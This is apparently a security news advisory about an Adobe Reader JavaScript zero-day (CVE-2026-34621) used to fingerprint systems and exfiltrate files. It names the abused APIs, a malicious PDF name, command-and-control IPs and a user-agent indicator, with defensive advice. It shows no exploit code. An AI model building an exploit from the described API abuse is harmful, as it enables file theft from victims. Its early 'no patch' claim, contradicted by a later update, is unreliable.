What is the Adobe Reader zero-day?

It is a logic flaw in the JavaScript engine that allows attackers to bypass sandbox security and steal sensitive system information.

How does the exploit work?

The exploit uses obfuscated JavaScript within a PDF to call privileged APIs like util.readFileIntoStream() and RSS.addFeed() for data exfiltration.

What data is at risk?

Attackers can steal OS versions, language settings, Adobe Reader version numbers, and arbitrary local files accessible by the process.

Is there a patch available?

No official patch has been released yet, although the vulnerability has been disclosed to Adobe Security.

How can I detect or prevent this attack?

Monitor for the 'Adobe Synchronizer' User Agent string, block C2 IPs like 169.40.2.68, and disable JavaScript in Adobe Reader settings.

Attack

Adobe Reader Zero-Day Exploited in Targeted Fingerprinting Campaign

published: April 10, 2026

Take action: If you use Adobe Reader, open it right now and disable JavaScript by going to Edit > Preferences > JavaScript and uncheck "Enable Acrobat JavaScript". This blocks the exploit's main attack path. Until Adobe releases a patch, don't open any PDF files from unknown or unexpected sources, and if you must view untrusted PDFs, use a browser-based viewer like Chrome or Edge instead of Adobe Reader. Always verify the source of PDF files before opening them.

Learn More

Researcher reports a critical zero-day vulnerability in Adobe Reader that allows attackers to steal data and compromise systems by just opening a file. Security researcher Haifei Li discovered the flaw, which has been actively exploited in the wild since at least December 2025. The exploit targets the latest versions of the software and remained undetected for months due to its low detection rate on security platforms.

The vulnerability is an CVE-2026-34621 (CVSS score 8.6, Adobe severity Critical), A logic flaw in the JavaScript engine that lets malicious code bypass sandbox security boundaries. Attackers use obfuscated scripts to call privileged APIs, such as util.readFileIntoStream(), to access the local file system. This mechanism allows the document to read arbitrary files and establish a command-and-control link for further payload delivery.

Update - as of 12th of April 2026, Adobe has provided a CVE tracking ID CVE-2026-34621 and a score of Critical CVSS 8.6 and has released a patch.

The exploit uses environment fingerprinting to identify targets before deploying more damaging payloads. Attackers can exfiltrate the following data items:

Operating system version and language settings
Adobe Reader version and local file paths
Sensitive system files like ntdll.dll
Arbitrary local data accessible by the sandboxed process

Analysis of the malicious PDF, titled yummy_adobe_exploit_uwu.pdf, shows it uses the RSS.addFeed() API to send stolen data to remote servers. The campaign uses infrastructure including IP addresses 169.40.2.68 and 188.214.34.20 to manage exfiltration and receive encrypted JavaScript updates. This multi-stage approach suggests a targeted effort by threat actors to gain persistent access to specific corporate or government networks.

Adobe Security has received a disclosure regarding this flaw, but a formal patch is not yet available to the public. Organizations should monitor network traffic for the "Adobe Synchronizer" User Agent string and block known malicious IP addresses.

Users should avoid opening PDF documents from untrusted sources and consider disabling JavaScript within Adobe Reader settings to block the exploit's execution path.

Adobe Reader Zero-Day Exploited in Targeted Fingerprinting Campaign

Read More
DarkSword Exploit Kit Targets iPhones with Multi-Stage Malware …
Active! Mail remote code execution flaw actively exploited
Critical command injection flaw in Edimax IC-7100 IP …
Critical vulnerability in CrushFTP actively exploited
CISA warns of active exploitation of three years …